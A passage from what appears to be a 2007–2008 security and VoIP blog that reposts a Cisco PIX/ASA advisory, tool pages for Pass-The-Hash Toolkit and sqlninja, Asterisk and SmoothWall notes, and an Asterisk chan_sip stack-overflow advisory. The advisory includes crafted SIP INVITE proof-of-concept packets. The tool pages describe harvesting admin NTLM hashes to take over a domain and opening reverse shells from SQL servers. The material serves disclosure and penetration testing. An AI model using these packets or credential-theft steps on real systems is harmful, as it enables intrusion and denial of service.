Note: The TTL decrement feature was introduced in version 7.2(2), and it is disabled by default. The Cisco Firewall Services Module (FWSM) is not vulnerable.

No other Cisco products are currently known to be affected by this vulnerability.
Top of the section Close Section
Details

A crafted IP packet vulnerability exists in the Cisco PIX 500 Series Security Appliance (PIX) and the Cisco 5500 Series Adaptive Security Appliance (ASA) that may result in a reload of the device. This vulnerability is triggered during processing of a crafted IP packet when the Time-to-Live (TTL) decrement feature is enabled. This vulnerability is documented in Cisco Bug ID CSCsk48199 ( registered customers only) .
Top of the section Close Section
Vulnerability Scoring Details

Cisco has provided scores for the vulnerability in this advisory based on the Common Vulnerability Scoring System (CVSS). The CVSS scoring in this Security Advisory is done in accordance with CVSS version 2.0.

CVSS is a standards-based scoring method that conveys vulnerability severity and helps determine urgency and priority of response.

Cisco has provided a base and temporal score. Customers can then compute environmental scores to assist in determining the impact of the vulnerability in individual networks.

Cisco has provided an FAQ to answer additional questions regarding CVSS at

http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html .

Cisco has also provided a CVSS calculator to help compute the environmental impact for individual networks at

http://intellishield.cisco.com/security/alertmanager/cvss .

CSCsk48199 - Cisco PIX and ASA TTL Vulnerability

Calculate the environmental score of CSCsk48199

CVSS Base Score - 7.8

Access Vector

Access Complexity

Authentication

Confidentiality Impact

Integrity Impact

Availability Impact

Network

Low

None

None

None

Complete

CVSS Temporal Score - 6.4

Exploitability

Remediation Level

Report Confidence

Functional

Official-Fix

Confirmed

Top of the section Close Section
Impact

Successful exploitation of the vulnerability described in this advisory will result in a reload of the affected device. Repeated exploitation can result in a sustained denial of service (DoS) condition.
Top of the section Close Section
Software Versions and Fixes

This vulnerability is fixed in software version 7.2(3)6 or 8.0(3) and later.

When considering software upgrades, also consult http://www.cisco.com/go/psirt and any subsequent advisories to determine exposure and a complete upgrade solution.

In all cases, customers should exercise caution to be certain the devices to be upgraded contain sufficient memory and that current hardware and software configurations will continue to be supported properly by the new release. If the information is not clear, contact the Cisco Technical Assistance Center (TAC) or your contracted maintenance provider for assistance.
Top of the section Close Section
Workarounds

Disable the TTL decrement feature using the no set connection decrement-ttl command in class configuration mode.

ASA(config)#policy-map localpolicy1
ASA(config-pmap)#class local_server
ASA(config-pmap-c)#no set connection decrement-ttl
ASA(config-pmap-c)#exit

For additional information on identifying and mitigating TTL based attacks, please refer to the Cisco Applied Intelligence White Paper "TTL Expiry Attack Identification and Mitigation", available at: http://cisco.com/web/about/security/intelligence/ttl-expiry.html.
Top of the section Close Section
Obtaining Fixed Software

Cisco has released free software updates that address this vulnerability. Prior to deploying software, customers should consult their maintenance provider or check the software for feature set compatibility and known issues specific to their environment.

Customers may only install and expect support for the feature sets they have purchased. By installing, downloading, accessing or otherwise using such software upgrades, customers agree to be bound by the terms of Cisco's software license terms found at http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html , or as otherwise set forth at Cisco.com Downloads at http://www.cisco.com/public/sw-center/sw-usingswc.shtml .

Do not contact psirt@cisco.com or security-alert@cisco.com for software upgrades.
Customers with Service Contracts

Customers with contracts should obtain upgraded software through their regular update channels. For most customers, this means that upgrades should be obtained through the Software Center on Cisco's worldwide website at http://www.cisco.com.
Customers using Third Party Support Organizations

Customers whose Cisco products are provided or maintained through prior or existing agreements with third-party support organizations, such as Cisco Partners, authorized resellers, or service providers should contact that support organization for guidance and assistance with the appropriate course of action in regards to this advisory.

The effectiveness of any workaround or fix is dependent on specific customer situations, such as product mix, network topology, traffic behavior, and organizational mission. Due to the variety of affected products and releases, customers should consult with their service provider or support organization to ensure any applied workaround or fix is the most appropriate for use in the intended network before it is deployed.
Customers without Service Contracts

Customers who purchase direct from Cisco but do not hold a Cisco service contract, and customers who purchase through third-party vendors but are unsuccessful in obtaining fixed software through their point of sale should acquire upgrades by contacting the Cisco Technical Assistance Center (TAC). TAC contacts are as follows.

* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com

Customers should have their product serial number available and be prepared to give the URL of this notice as evidence of entitlement to a free upgrade. Free upgrades for non-contract customers must be requested through the TAC.

Refer to http://www.cisco.com/warp/public/687/Directory/DirTAC.shtml for additional TAC contact information, including localized telephone numbers, and instructions and e-mail addresses for use in various languages.
Top of the section Close Section
Exploitation and Public Announcements

The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability described in this advisory.
Top of the section Close Section
Status of this Notice: Final

THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS DOCUMENT AT ANY TIME.

A stand-alone copy or Paraphrase of the text of this document that omits the distribution URL in the following section is an uncontrolled copy, and may lack important information or contain factual errors.
Top of the section Close Section
Distribution

This advisory is posted on Cisco's worldwide website at :

http://www.cisco.com/warp/public/707/cisco-sa-20080123-asa.shtml

In addition to worldwide web posting, a text version of this notice is clear-signed with the Cisco PSIRT PGP key and is posted to the following e-mail and Usenet news recipients.

* cust-security-announce@cisco.com
* first-teams@first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com

Future updates of this advisory, if any, will be placed on Cisco's worldwide website, but may or may not be actively announced on mailing lists or newsgroups. Users concerned about this problem are encouraged to check the above URL for any updates.
Top of the section Close Section
Revision History

Revision 1.0

2008-January-23

Initial public release

Top of the section Close Section
Cisco Security Procedures

Complete information on reporting security vulnerabilities in Cisco products, obtaining assistance with security incidents, and registering to receive security information from Cisco, is available on Cisco's worldwide website at http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html. This includes instructions for press inquiries regarding Cisco security notices. All Cisco security advisories are available at http://www.cisco.com/go/psirt.
Top of the section Close Section

Pass-The-Hash Toolkit

2008-02-08T06:24:00.000-08:00

Tomado de: http://oss.coresecurity.com/projects/pshtoolkit.htm

What is Pass-The-Hash Toolkit?

The Pass-The-Hash Toolkit contains utilities to manipulate the Windows Logon Sessions mantained by the LSA (Local Security Authority) component. These tools allow you to list the current logon sessions with its corresponding NTLM credentials (e.g.: users remotely logged in thru Remote Desktop/Terminal Services), and also change in runtime the current username, domain name, and NTLM hashes (YES, PASS-THE-HASH on Windows!).

Utilities in the toolkit:

* IAM.EXE: Pass-The-Hash for Windows. This tool allows you to change your current NTLM credentials withouth having the cleartext password but the hashes of the password. The program receives a username, domain name and the LM and NT hashes of the password; using this it will change in memory the NTLM credentials associated with the current windows logon session. After the program performs this operation, all outbound network connections to services that use for authentication the NTLM credentials of the currently logged on user will utilize the credentials modified by IAM.EXE. This includes 'net use', 'net view', many third-party DCOM services that use NTLM authentication, etc. This is basically 'pass-the-hash' for windows; one of the main advantages is that you don't need to use a modified version of samba or samba-tng and be restricted to the limited functionality they implement, you can now use windows and any third-party software with stolen hashes withouth having to obtain the cleartext version of a password. For more information take a look at this paper I wrote back in 2000 Modifying Windows NT Logon Credentials.

* WHOSTHERE.EXE: This tool will list logon sessions with NTLM credentials (username,domain name, LM and NT hashes). Logon sessions are created by windows services that log in using specific users, remote desktop connections, etc. This tool has many uses, one that i think is interesting: Let's say you compromised a Windows Server that is part of a Windows Domain (e.g.: Backup server) but is NOT the domain controller. Since it is not the domain controller, you only have access to the local SAM and although you did effectively comprise a sensitive server you did not compromise the domain. However, it is very common in such situations to find that administrators are using Remote Desktop to connect to the compromised server to perform different tasks. So this is your chance, just wait for the administrator to log into the compromised server using remote desktop, at that point, run 'WHOSTHERE.EXE' and you will observe the administrators username,domain name, and NTLM hashes. Now go to your machine, use them with IAM.EXE and compromise the domain controller using the administrator's credentials.

* GENHASH.EXE: This is a small utility that generates LM and NT hashes using some 'undocumented' functions of the Windows API. This is a small tool to aid testing of IAM.EXE.

Source Code
o Latest stable release (1.2), updated on January 21, 2008. gzip'd tarball.

Win32 binaries
o Latest stable release (1.2), updated on January 21, 2008. gzip'd tarball

Setup

Quick start:There's not much to be done, extract the .tgz file and have fun!.

Requirements
o You can compile the tools using Microsoft Visual C++ 2005 Express Edition (available at http://msdn.microsoft.com/vstudio/express/). Minor modifications might be needed to compile them using other C compilers.
o You must have Administrator privileges to run these tools (except for genhash.exe).
o IAM.EXE was mostly tested on WinXP and Windows Server 2003, although it should also work on Vista. WHOSTHERE.EXE now works correctly on Windows Server 2003. Support for Vista will be added.

Documentation

Click the following link for an online copy of the documentation. This page contains instructions on how to use the tools.

Known issues

This version contains modifications that make it work better in Windows Server 2003 and in German and French versions of WinXPSP2, checkout the WHATSNEW file. If you have any problems please let me know!.

Licensing

This software is provided under the following license for non-commercial use.

Contact Us

Whether you want to report a bug, send a patch or give some suggestions on this package, drop us a few lines at oss@coresecurity.com . To contact me, the author, you can reach me at hochoa[ a t ]coresecurity.com

SQL Ninja! ...a SQL Server injection & takeover tool

2008-02-08T06:20:00.000-08:00

Tomado de: http://sqlninja.sourceforge.net/

Introduction

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a web application that uses Microsoft SQL Server as its back-end.
Its main goal is to provide a remote shell on the vulnerable DB server, even in a very hostile environment. It should be used by penetration testers to help and automate the process of taking over a DB Server when a SQL Injection vulnerability has been discovered.
It is released under the GPLv2 and it has been featured on SecurityHack's Top 15 Free SQL Injection Scanners, which is a good result for something that started as a small script written on-the-fly during a pen-test :)
Features

The full documentation can be found in the tarball and also here, but here's a list of what the Ninja does:

* Fingerprint of the remote SQL Server (version, user performing the queries, user privileges, xp_cmdshell availability, DB authentication mode)
* Bruteforce of 'sa' password (in 2 flavors: dictionary-based and incremental)
* Privilege escalation to sysadmin group if 'sa' password has been found
* Creation of a custom xp_cmdshell if the original one has been removed
* Upload of netcat (or any other executable) using only normal HTTP requests (no FTP/TFTP needed)
* TCP/UDP portscan from the target SQL Server to the attacking machine, in order to find a port that is allowed by the firewall of the target network and use it for a reverse shell
* Direct and reverse bindshell, both TCP and UDP
* DNS-tunneled pseudo-shell, when no TCP/UDP ports are available for a direct/reverse shell, but the DB server can resolve external hostnames (check the documentation for details about how this works)
* Evasion techniques to confuse a few IDS/IPS/WAF

Platforms supported

Sqlninja is written in Perl and should run on any UNIX based platform with a Perl interpreter, as long as all needed modules have been installed. So far it has been successfully tested on:

* Linux
* FreeBSD
* Mac OS X

Sqlninja does not run on Windows and I am not planning a port in the near future
Author

icesurfer - r00t .at. northernfortress .dot. net
PGP ID: 0x2DFF3D59

Try To Defeat ME!

2008-02-08T06:13:00.000-08:00

Bueno mis plegarias han sido escuchadas he recibido patrocinio y seguire con el BLog
desde mi Portatil Dell Vostro 1000 Desde el cual es lo suficientemente modesto para escribir en este blog...
Ahora
Necesito Un Patrocinador PARA UNA MAQUINA SUN tipo pc X86 o 64bits
Con 2 Gigas de Ram para Hacer Pruebas Por virtualización
y seguir aportando cosas interesantes.....
y Alguien que me patrocine para tener internet ya que no tengo en casa....
Recuerden
Telefonos en Colombia
574 4222366
57 3012958610
Hasta Pronto

Si desean que regrese...

2008-01-12T00:28:00.000-08:00

Los siento amigos.... llevo meses sin postear mi vida ahora esta mal economicamente y por ende con problemas algunas personas me han contactado para preguntarme sobre el blog y mis entradas... pero igual no me hablan de Dinero Oportunidades o Posibilidades... y por ende si no hay dinero no puedo sacar tiempo....

Lo siento mis sinceras disculpas-------

Si desean que ponga en marcha mis proyectos de Asterisk trucos de PHP Perfilamientos y refuerzo de seguridad en linux consejos de Pen Testing y actualidad

Contacteme y hableme quiza pueda encontrar en mi el talento que busca....

Office Communications Server & Asterisk

2007-09-28T16:27:00.000-07:00

Search google with "sip pstn site:www.microsoft.com asterisk"
You will find out how to configure LCS static routing to SIP Gateway,
like Asterisk
but you need patch Asterisk to support TCP.
http://bugs.digium.com/view.php?id=4903
Step1: configure LCS 2005 to let sip uri: *@pstngw.domain to route to
next hop: pstngw ip address
Step2: patch your asterisk chan_sip.c to support TCP
Step3: configure your Asterisk sip.conf, extensions.conf

simple example :-)
sip.conf
context=sip_incoming

extensions.conf
[sip_incoming]
exten => _XX.,1,Answer
exten => _XX.,2,Noop(do trust ip check or some authentication)
exten => _XX.,3,Dial(Zap/${EXTEN}&SIP/${EXTEN})

SmoothWall Express 3

2007-09-19T11:56:00.000-07:00

SmoothWall Express 3 - "Polar" Release Notes

Introduction

Express 3.0 is our latest version of the long running and successful SmoothWall Express firewall.

Editions

Polar is available in four editions:

User edition - 32bit
Developer edition - 32bit
User edition - 64bit
Developer edition - 64bit

The developer editions includes the complete SmoothWall Express functionality, but also contains the needed tools for working on Express itself, including complete builds, check outs and commits. It is therefore possible for interested coders to work on Express from their very own firewall. This marks a turning point for SmoothWall: it is now easier then ever for people to work on the project, make custom modifications and get involved with the SmoothWall team.

Please bear in mind that in order to do full builds of Express, a reasonable spec machine and a fair of amount of patience is required. Typical build times are about 5 hours for a 1Ghz machine.

Please read the build notes for more information on using the Developer Edition edition of Polar, including instructions on how to checkout and build a Polar ISO from scratch.

64bit support

Degu (the version before Sammy, our Release Candidate) was the first ever version of SmoothWall to come in multiple architectures: 32bit, for standard x86 compatibles; and 64bit, for Intel Core 2s (and other Intels with 64bit support) and 64bit Athlon chips. This change to multiple processor types means that updates are specific to the different architectures. We are especially interested to hear from people running Smoothie on 64bit machines.

Please note that there are some small limitations on hardware support when running on a 64bit machine. The BeWAN driver, used in Smoothie for years, is not available on 64bit machines because it uses a binary blob (compiled code) that is not available for 64bit machines. Also, the Connexant driver does not work on 64bit machines.

Headline new features relative to 2.0.

Supports a 4th NIC for Wireless Access Points.
64bit support - additional builds for 64bit Intel and AMD chips.
Based upon linux 2.6 kernel.
New realtime traffic graph shows traffic bandwidth usage over time (AJAX).
Per-IP address traffic statistics collection in all traffic stats pages - you can now view weekly, monthly, etc totals for specific internal IPs, or see which local IP is using the most bandwidth, in real-time.
IM proxy with logging and filtering abilities (MSN/AIM/ICQ/Yahoo).
SATA/SCSI support.
Support for many new gigabit NICs.
Streamlined installer/setup.
Quality-of-Service (QoS) support for traffic-shaping and management - nice and easy to use but powerful, can traffic shape Peer-to-Peer traffic.
SIP proxy support using siproxd, with transparent mode.
Protection-level profile selector at install time can be used to pre-configure default settings.
Timed-access feature for allowing or blocking access to a list of IPs or subnets based on time of day and day of the week.
Outbound filtering.
Portforward and other networking pages now use the new service list controls.
New update mechanism which can download and install all pending updates with a single click.
Brand new even prettier theme. The polar bear is back!
Devel editions for people interested in hacking on smoothie.

Detailed list of new features and impovements

Added support for empty hostnames in Dynamic DNS pages.
Runtime kernel now has DMA support for all supported IDE chipsets. Added bridging module (but no tools) for people who want to work with bridging.
Added ISC DHCP integration option to dnsmasq, but no UI.
Added support for setting the NTP servers that the DHCP server will supply to clients. DHCP server now marks itself as "authorative".
Hostname can now only contain valid chars to stop the situation where you could set a hostname that would be incompatible to squid.
Minor fixes to the networking probe setup code.
Added support for the VT8237A VIA SATA chip.
Updated autorun HTML page so it looks supercool.
Swap sized according to the amount of RAM.
Widended setup password entry from 20 to 25 chars.
Added support for more gigabit nics.
Added Conexant ADSL PCI support.
UPnP support using miniunpd.
Online help now has a glossary.
The "Other" system log viewer has been renamed "System" logs.
Slashes now allowed in PPP usernames and passwords to fix problems with some ISPs.
Cleanups of install and setup code. Also changed probing so it will not re-probe from the top of the list after adding a NIC.
Added EHCI USB, and TUN/TAP modules, but neither are ever loaded at present.
Smoothd privileged deamon replacing setuid helpers, increasing the speed of te web interface.
Installer now supports USB keyboards and CDROMS, making it possible to install Smoothie Express on "legacy-free" hardware.
Now includes a POP3 proxy with support for Anti-Virus using ClamAV.
Online validation using javascript to show input validity before the Add and Save buttons have been pressed.
Many core components have been version-bumped to the latest versions for improved security and reliability.
Tables of data are now sortable.
Can update snort rules using sourcefire's "Oink code" mechanism.
Comments can be included in portforwards and similar listed items.
Can now DROP bad traffic instead of REJECTing it.
GREEN is probed with the other NICs now so it is possible to replace GREEN.
Firewall log viewer looks much nicer and has some AJAX coolness.
Includes many new NIC drivers that are in 2.6.
NTP service for the local network.
Local hosts list that can be served through the DNS proxy.
Replacement traffic stats page.
Many internal changes to make the code more organised and easier to work with.
Jazzed up control page.
Easier to use log viewers with Google-style pagination.

Installing

The installer will automatically probe for and load SATA and SCSI drivers if no IDE disk is found.

The old "media menu" has gone. While only CDROM installs are supported, it isn't needed anyway, but in the future it will not be needed anyway because the installer will know what type of install is required.

To speed along the install, the ISDN, ADSL, and DHCP screens are not automatically presented. Instead a menu appears where these features can be configured.

IM proxy

3.0 incorporates an IM (Instant Messenger) proxy called IMSpector that is able to log and filter IM conversations in a variety of protocols including MSN, ICQ, AIM, Yahoo and IRC. This proxy also has an optional swear-word filter with a premade list of naughty words. The configuration page is under services; log viewer is under logs and is noteworthy because it shows conversations as they happen by using AJAX techniques to update the webpage.

Other notes

We've made a small change to the call-home process. It will now send back a dump of "lspci", "lsmod" and the USB device table. This was done so we could hopefully in the future build a compatibility matrix for smoothie from this data. Such a chart might even be useful to the Linux community as a whole as well.

To enhance the security of the web interface, a password is now required to view the home page whereas previously this page was publicly viewable from the internal network. Any valid username (admin, dial, etc) will be able to view the home page.

The traffic graphs page shows traffic stats for each interface, with current hour, current, day etc totals, as well as "real time" reports of traffic load on each interface. Note that this code was written for the commercial series of SmoothWall products, GPLd, and included in Express. We'd love to see this particular piece of software used in other projects as well.

A new page, bandwidth bars, shows a continually updated representation of the bandwidth usage for each interface which is updated once a second through the use of AJAX and Javascript.

The time server is enabled on the "time" screen under Preferences. The timeserver (based on openntpd) has been tested against linux (ntpd etc) and Windows and works well. The time server will service requests on the GREEN side only.

The update mechanism has been reworked. In addition to the older "refresh updates list", download, upload and install mechanism, Express 3.0 has a semi automated installer. This will perform the actions of downloading and installing updates (in sequence) by use of a single update button. This should allow for much easier maintenance.

Feedback

Please report all feedback, especially any problems encountered, to the Community forum "Express 3.0 development".

Pagina destacada

2007-09-19T09:28:00.001-07:00

http://www.tmcnet.com/scripts/newsalerts/

ersona to Persona - Custom Voice Recordings vs. Text To Speech & More

2007-09-19T07:35:00.000-07:00

When deploying a speech-enabled application, it's easy to see how your new media will improve productivity, decrease operating costs, increase revenues, enhance customer service satisfaction, and effectively manage your internal databases, but what will your system do for your "brand"? Successful speech-enabled applications create a "personality", or persona, that helps "brand" your offering. People develop opinions about the quality of your offering, and the credibility of your application, based on what they hear. When the only link between your application and your audience is a voice, having the right persona is critical. Companies spend millions of dollars on PR campaigns and marketing programs to build identity and promote their corporate image, but how many recognize the role persona will play in their speech-enabled application? The voice persona of your system will communicate, on your behalf, virtually every hour of every day to every client and prospect. Will it be a synthesized voice that sounds believable and sincere, maybe even happy; or a custom voice recording where the voice talent not only sounds happy, she was smiling too! So who will speak to your audience?

Custom voice recordings
Text-To-Speech "synthesized" voice
Both custom voice recordings and TTS

Custom voice recordings for telephony have come a long way since the early days of touch-tone based IVR systems. The need for a more "natural" interaction between the user and the application was created with the development of world class speech recognition applications from companies such as SpeechWorks, Nuance, and Philips. Instead of mechanical sounding "press 1, press 2 menus" and touch tone entries, the user uses their voice to "naturally" interact with the system. The success of any speech recognition application relies heavily on "natural" sounding dialogue, encouraging the same natural dialogue from the user, much like they were talking to a neighbor, or a friend… Now That's Persona! It's a comfortable interaction with someone you can relate to in some way, someone you trust. It is clear that voice persona can be directly linked to the success or failure of an entire application. So will it be a "real" person, or utterances made to sound like a "real" person? Custom voice recordings produced by professional voice talent increase user acceptance by creating a unique persona and contribute to the overall effectiveness of the user interface. For any given call or transaction, we want to the user to believe, at least once, that they are talking to a "real" person. This simply doesn't happen with TTS, not yet anyway. TTS has also come a long way, and FAST! Today's TTS voices are incredibly natural and can even portray emotion and emphasis when needed. As companies large and small move to speech-enable their business, TTS as a voice solution offers many attractive benefits including low cost, fast turnaround production of any phrase or sentence, no limit on the phrases than can be created, and voice consistency. Can a TTS voice really provide the right persona for your application? It depends on your specific application and the level of quality your audience expects. A TTS voice for your auto attendant or after-hours greeting, for example, would likely not have the persona necessary to enhance your corporate image. Also, custom auto attendant greetings can be mixed in the studio with "stingers" or sound identifiers that further build your brand. TTS is an amazing technology that will continue to grow and develop. We can expect to hear more lifelike interaction with TTS, more natural spoken dialogue, integrated emotions and emphasis, and because it is already working from text, more widespread integration with the Internet and various hand-held devices. Utilizing both custom voice recordings and TTS seems like the simple solution, right? Develop your persona and "brand" through custom voice recordings, then supplement database and other dynamic content with TTS. Not so fast! Many studies have shown that mixing custom voice recordings and TTS often results in an undesirable experience for the user. The overall persona of the system must be consistent or it becomes confusing. Wouldn't it would be annoying to interact with someone who always had someone else complete their sentences? The perception and retention of the message by the user becomes corrupt, furthermore the credibility of the application is greatly diminished. There are, however, some applications that successfully blend TTS and custom voice recordings. By careful integration of TTS only when necessary, these applications are able to enjoy the benefits of natural language dialogue a majority of the time, and use TTS as an added value for specific options, such as reading your e-mail. With a carefully crafted system and by matching the TTS voice with the custom voice, the interface is virtually seamless and the overall user experience is enhanced. Deploying a successful speech-enabled application requires a fun, easy to use interface, a voice persona that promotes your brand, and quality production. Although TTS is good and getting better, custom voice recordings cannot yet be replaced by complete synthesis. Even if TTS were perfect, where you couldn't tell the difference between synthesis and a custom voice recording, would your audience perceive the difference? Many professional voice talents and custom prompt recording studios are growing concerned that TTS will replace them. Some TTS companies seem to even promote this fact. Remember when the "drum machine" came out and it was going to replace every drummer in the world? To hear audio samples from RightVoice Click Here. Matt Right has been president and CEO of RightVoice.Net since its inception three years ago. RightVoice.Net is located in Atlanta, GA, and details about the company can be obtained from its web site: www.rightvoice.net.

http://say.expressivo.com/
http://www.wordtalk.co.uk/html/download.html
http://www.nextup.com/neospeech.html
http://www.talkforme.com/
http://www.disc2.dk/tools/SGsurvey.html#intr
http://www.texttospeechblog.com/
http://www.haskins.yale.edu/tada_download/index.html
http://www.speech.cs.cmu.edu/comp.speech/
http://www.dmoz.org/Computers/Speech_Technology/Speech_Synthesis/
http://itcansay.com/?page=reader
http://support.microsoft.com/kb/306537/ES/
http://support.microsoft.com/kb/306901/ES/
http://support.microsoft.com/kb/E278927/ES/
http://www.microsoft.com/speech/speech2007/default.mspx
http://support.microsoft.com/kb/306902/ES/
http://support.microsoft.com/kb/306899/ES/
http://www.microsoft.com/windowsxp/using/accessibility/default.mspx#EKCAC
http://www.microsoft.com/windowsxp/using/accessibility/narratorturnon.mspx
http://msdn.microsoft.com/library/default.asp?url=/library/en-us/SAPI51sr/Whitepapers/WP_XML_TTS_Tutorial.asp
https://www.cepstral.com/downloads/
http://en.wikipedia.org/wiki/List_of_screen_readers
http://www.readplease.com
http://trace.wisc.edu/world/computer_access/dos/dosshare.html#enable
http://en.wikipedia.org/wiki/Festival_Speech_Synthesis_System
http://en.wikipedia.org/wiki/Speech_synthesis
http://en.wikipedia.org/wiki/Text_to_speech
http://freetts.sourceforge.net/docs/index.php
http://www.fon.hum.uva.nl/praat/
http://www.kurzweiledu.com/downloads_kez3000.aspx
http://en.wikipedia.org/wiki/Apple_PlainTalk
http://www.bytecool.com/voices.htm
http://www.loquendo.com/es/technology/TTS.htm
http://www.w3.org/TR/voice-tts-reqs/
http://www.freedownloadscenter.com/Best/msn-tts-voices.html
http://www.nch.com.au/verbose/index.html
http://sourceforge.net/projects/text2speech
http://www.research.att.com/viewProject.cfm?prjID=315
http://www.brothersoft.com/downloads/text-to-speech-voices.html

Multiple Unauthenticated Stack Overflows in Asterisk Chan_sip.c (STP)

2007-09-18T11:19:00.002-07:00

tomado de http://www.securiteam.com/unixfocus/5GP011FM0C.html

Two closely related stack based buffer overflows exist in the SIP/SDP handler of Asterisk, the vulnerabilities are very similar but exist as two separate unsafe function calls. The T38FaxRateManagement and T38FaxUdpEC SDP parameters can be exploited remotely leading to arbitrary code execution without authentication. In order for these overflows to occur, t38 fax over SIP must be enabled in sip.conf.

Examples of SIP INVITE packets are shown in the details section, however these vulnerabilities can be triggered with a number of different SIP messages affecting calls received by Asterisk, or in response to calls made by Asterisk.

Credit:
The information has been provided by Barrie Dempster.

What if you could scan your network for all the vulnerabilities on SecuriTeam.com, automatically, every day?

Vulnerable Systems:
* Asterisk versions prior to 1.4.3
* AsteriskNOW versions prior to Beta6
* Asterisk Appliance Developers Kits versions prior to 0.4.0

Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxRateManagement parameter

A remote unauthenticated stack overflow exists in the SIP/SDP handler of Asterisk. By sending a SIP packet with SDP data which includes an overly long T38 parameter it is possible to overflow a stack based buffer and execute arbitrary code.

The process_sdp function of chan_sip.c in Asterisk contains the following vulnerable call to sscanf.

else if ((sscanf(a, "T38FaxRateManagement:%s", s) == 1)) {
found = 1;
if (option_debug > 2)

ast_log(LOG_DEBUG, "RateMangement: %s\n", s);
if (!strcasecmp(s, "localTCF"))
peert38capability |= T38FAX_RATE_MANAGEMENT_LOCAL_TCF;
else if (!strcasecmp(s, "transferredTCF"))
peert38capability |= T38FAX_RATE_MANAGEMENT_TRANSFERED_TCF;

This attempts to read the "T38FaxRateManagement:" option from the SDP within a SIP packet and copy the succeeding string into "s". There are no checks on the length of this string and we can therefore write past the boundaries of the "s" variable overwriting adjacent memory on the stack. "s" is defined earlier in this function as being a character array of only 256 bytes.

The following example packet demonstrates an overflow of this parameter:
INVITE sip:200@127.0.0.1 SIP/2.0
Date: Wed, 21 Mar 2007 4:20:09 GMT
CSeq: 1 INVITE
Via: SIP/2.0/UDP
10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
User-Agent: NGS/2.0
From: "Barrie Dempster"
;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
To:
Contact:
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
Content-Type: application/sdp
Content-Length: 796
Max-Forwards: 70

v=0
o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=image 5004 UDPTL t38
a=T38FaxVersion:0
a=T38MaxBitRate:14400
a=T38FaxMaxBuffer:1024
a=T38FaxMaxDatagram:238
a=T38FaxRateManagement:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
a=T38FaxUdpEC:t38UDPRedundancy

Remote Unauthenticated stack overflow in Asterisk SIP/SDP T38FaxUdpEC parameter
A remote unauthenticated stack overflow exists in the SIP/SDP handler of Asterisk. By sending a SIP packet with SDP data which includes an overly long T38FaxUdpEC parameter it is possible to overflow a stack based buffer and execute arbitrary code.

The process_sdp function of chan_sip.c in Asterisk contains the following vulnerable call to sscanf.

else if ((sscanf(a, "T38FaxUdpEC:%s", s) == 1)) {
found = 1;
if (option_debug > 2)
ast_log(LOG_DEBUG, "UDP EC: %s\n", s);
if (!strcasecmp(s, "t38UDPRedundancy")) {
peert38capability |= T38FAX_UDP_EC_REDUNDANCY;

ast_udptl_set_error_correction_scheme(p->udptl, UDPTL_ERROR_CORRECTION_REDUNDANCY);

This attempts to read the "T38FaxUdpEC:" option from the SDP within a SIP packet and copy the succeeding string into "s". There are no checks on the length of this string and we can therefore write past the boundaries of the "s" variable overwriting adjacent memory on the stack. "s" is defined earlier in this function as being a character array of only 256 bytes.

The following example packet demonstrates an overflow of this parameter:
INVITE sip:200@127.0.0.1 SIP/2.0
Date: Wed, 21 Mar 2007 4:20:09 GMT
CSeq: 1 INVITE
Via: SIP/2.0/UDP
10.0.0.123:5068;branch=z9hG4bKfe06f452-2dd6-db11-6d02-000b7d0dc672;rport
User-Agent: NGS/2.0
From: "Barrie Dempster"
;tag=de92d852-2dd6-db11-9d02-000b7d0dc672
Call-ID: f897d952-2fa6-db49441-9d02-001b7d0dc672@hades
To:
Contact:
Allow: INVITE,ACK,OPTIONS,BYE,CANCEL,NOTIFY,REFER,MESSAGE
Content-Type: application/sdp
Content-Length: 796
Max-Forwards: 70

v=0
o=rtp 1160124458839569000 160124458839569000 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=image 5004 UDPTL t38
a=T38FaxVersion:0
a=T38MaxBitRate:14400
a=T38FaxMaxBuffer:1024
a=T38FaxMaxDatagram:238
a=T38FaxUdpEC:AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
